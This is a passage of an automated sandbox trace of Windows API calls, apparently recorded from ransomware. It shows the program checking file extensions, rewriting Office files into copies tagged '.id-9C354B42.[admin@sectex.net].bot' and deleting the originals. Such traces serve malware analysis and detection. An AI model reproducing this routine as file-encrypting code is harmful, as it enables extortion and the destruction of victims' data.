	[0143.337] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString=".bz2") returned 4
	[0143.337] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1
	[0143.337] lstrlenW (lpString=".7z") returned 3
	[0143.337] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString=".dbf") returned 4
	[0143.337] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString=".1cd") returned 4
	[0143.337] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString=".jpg") returned 4
	[0143.337] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString=".doc") returned 4
	[0143.337] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1
	[0143.337] lstrlenW (lpString=".docx") returned 5
	[0143.337] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1
	[0143.337] lstrlenW (lpString=".pdf") returned 4
	[0143.337] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString=".xls") returned 4
	[0143.338] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1
	[0143.338] lstrlenW (lpString=".xlsx") returned 5
	[0143.338] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1
	[0143.338] lstrlenW (lpString=".ppt") returned 4
	[0143.338] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1
	[0143.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.338] lstrlenW (lpString=".zip") returned 4
	[0143.338] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1
	[0143.338] lstrlenW (lpString=".rar") returned 4
	[0143.338] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1
	[0143.338] lstrlenW (lpString=".bz2") returned 4
	[0143.338] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1
	[0143.338] lstrlenW (lpString=".7z") returned 3
	[0143.338] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1
	[0143.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.338] lstrlenW (lpString=".dbf") returned 4
	[0143.338] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1
	[0143.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.338] lstrlenW (lpString=".1cd") returned 4
	[0143.338] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1
	[0143.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.338] lstrlenW (lpString=".jpg") returned 4
	[0143.338] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1
	[0143.338] lstrcmpiW (lpString1=".ACC", lpString2=".bot") returned -1
	[0143.338] lstrlenW (lpString="ACCESS12.ACC") returned 12
	[0143.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.339] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=495616) returned 1
	[0143.339] CloseHandle (hObject=0x3a0) returned 1
	[0143.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 0x20
	[0143.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.339] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.339] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0143.375] GetLastError () returned 0x0
	[0143.375] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x79000, lpOverlapped=0x0) returned 1
	[0143.408] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x79010, lpOverlapped=0x0) returned 1
	[0143.417] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.417] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.417] SetEndOfFile (hFile=0x25c) returned 1
	[0143.417] CloseHandle (hObject=0x25c) returned 1
	[0143.417] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.417] SetEndOfFile (hFile=0x3a0) returned 1
	[0143.473] CloseHandle (hObject=0x3a0) returned 1
	[0143.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 1
	[0143.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.473] lstrlenW (lpString=".doc") returned 4
	[0143.474] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".docx") returned 5
	[0143.474] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1
	[0143.474] lstrlenW (lpString=".pdf") returned 4
	[0143.474] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".xls") returned 4
	[0143.474] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".xlsx") returned 5
	[0143.474] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1
	[0143.474] lstrlenW (lpString=".ppt") returned 4
	[0143.474] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString=".zip") returned 4
	[0143.474] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".rar") returned 4
	[0143.474] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".bz2") returned 4
	[0143.474] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString=".7z") returned 3
	[0143.474] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString=".dbf") returned 4
	[0143.474] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString=".1cd") returned 4
	[0143.474] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString=".jpg") returned 4
	[0143.474] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.474] lstrlenW (lpString=".doc") returned 4
	[0143.474] lstrcmpiW (lpString1=".doc", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".docx") returned 5
	[0143.475] lstrcmpiW (lpString1=".docx", lpString2="2.ACC") returned -1
	[0143.475] lstrlenW (lpString=".pdf") returned 4
	[0143.475] lstrcmpiW (lpString1=".pdf", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".xls") returned 4
	[0143.475] lstrcmpiW (lpString1=".xls", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".xlsx") returned 5
	[0143.475] lstrcmpiW (lpString1=".xlsx", lpString2="2.ACC") returned -1
	[0143.475] lstrlenW (lpString=".ppt") returned 4
	[0143.475] lstrcmpiW (lpString1=".ppt", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.475] lstrlenW (lpString=".zip") returned 4
	[0143.475] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".rar") returned 4
	[0143.475] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".bz2") returned 4
	[0143.475] lstrcmpiW (lpString1=".bz2", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString=".7z") returned 3
	[0143.475] lstrcmpiW (lpString1=".7z", lpString2="ACC") returned -1
	[0143.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.475] lstrlenW (lpString=".dbf") returned 4
	[0143.475] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1
	[0143.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.475] lstrlenW (lpString=".1cd") returned 4
	[0143.475] lstrcmpiW (lpString1=".1cd", lpString2=".ACC") returned -1
	[0143.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned 60
	[0143.475] lstrlenW (lpString=".jpg") returned 4
	[0143.475] lstrcmpiW (lpString1=".jpg", lpString2=".ACC") returned 1
	[0143.475] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0143.475] lstrlenW (lpString="AECUTILS.VSL") returned 12
	[0143.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.500] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=41864) returned 1
	[0143.501] CloseHandle (hObject=0x2a0) returned 1
	[0143.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl")) returned 0x20
	[0143.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.501] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.501] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.502] GetLastError () returned 0x0
	[0143.502] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xa388, lpOverlapped=0x0) returned 1
	[0143.504] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa390, lpOverlapped=0x0) returned 1
	[0143.505] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.505] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.505] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.505] CloseHandle (hObject=0x3b4) returned 1
	[0143.505] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.505] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.509] CloseHandle (hObject=0x2a0) returned 1
	[0143.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.510] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl")) returned 1
	[0143.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.510] lstrlenW (lpString=".doc") returned 4
	[0143.510] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.510] lstrlenW (lpString=".docx") returned 5
	[0143.510] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1
	[0143.510] lstrlenW (lpString=".pdf") returned 4
	[0143.510] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.510] lstrlenW (lpString=".xls") returned 4
	[0143.510] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.510] lstrlenW (lpString=".xlsx") returned 5
	[0143.510] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1
	[0143.511] lstrlenW (lpString=".ppt") returned 4
	[0143.511] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString=".zip") returned 4
	[0143.511] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.511] lstrlenW (lpString=".rar") returned 4
	[0143.511] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString=".bz2") returned 4
	[0143.511] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString=".7z") returned 3
	[0143.511] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString=".dbf") returned 4
	[0143.511] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString=".1cd") returned 4
	[0143.511] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString=".jpg") returned 4
	[0143.511] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.511] lstrlenW (lpString=".doc") returned 4
	[0143.511] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.511] lstrlenW (lpString=".docx") returned 5
	[0143.511] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1
	[0143.511] lstrlenW (lpString=".pdf") returned 4
	[0143.512] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString=".xls") returned 4
	[0143.512] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.512] lstrlenW (lpString=".xlsx") returned 5
	[0143.512] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1
	[0143.512] lstrlenW (lpString=".ppt") returned 4
	[0143.512] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.512] lstrlenW (lpString=".zip") returned 4
	[0143.512] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.512] lstrlenW (lpString=".rar") returned 4
	[0143.512] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString=".bz2") returned 4
	[0143.512] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString=".7z") returned 3
	[0143.512] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.512] lstrlenW (lpString=".dbf") returned 4
	[0143.512] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.512] lstrlenW (lpString=".1cd") returned 4
	[0143.512] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60
	[0143.512] lstrlenW (lpString=".jpg") returned 4
	[0143.512] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.512] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0143.512] lstrlenW (lpString="ASSET.VRD") returned 9
	[0143.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.513] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1694) returned 1
	[0143.513] CloseHandle (hObject=0x2a0) returned 1
	[0143.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd")) returned 0x20
	[0143.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.513] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.514] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.514] GetLastError () returned 0x0
	[0143.514] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x69e, lpOverlapped=0x0) returned 1
	[0143.515] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x6a0, lpOverlapped=0x0) returned 1
	[0143.516] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.516] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0143.517] SetEndOfFile (hFile=0x38c) returned 1
	[0143.517] CloseHandle (hObject=0x38c) returned 1
	[0143.517] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.517] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.519] CloseHandle (hObject=0x2a0) returned 1
	[0143.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd")) returned 1
	[0143.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString=".doc") returned 4
	[0143.520] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString=".docx") returned 5
	[0143.520] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0143.520] lstrlenW (lpString=".pdf") returned 4
	[0143.520] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString=".xls") returned 4
	[0143.520] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0143.520] lstrlenW (lpString=".xlsx") returned 5
	[0143.520] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0143.520] lstrlenW (lpString=".ppt") returned 4
	[0143.520] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString=".zip") returned 4
	[0143.520] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0143.520] lstrlenW (lpString=".rar") returned 4
	[0143.520] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString=".bz2") returned 4
	[0143.520] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString=".7z") returned 3
	[0143.520] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString=".dbf") returned 4
	[0143.520] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
	[0143.520] lstrlenW (lpString=".1cd") returned 4
	[0143.520] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0143.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57
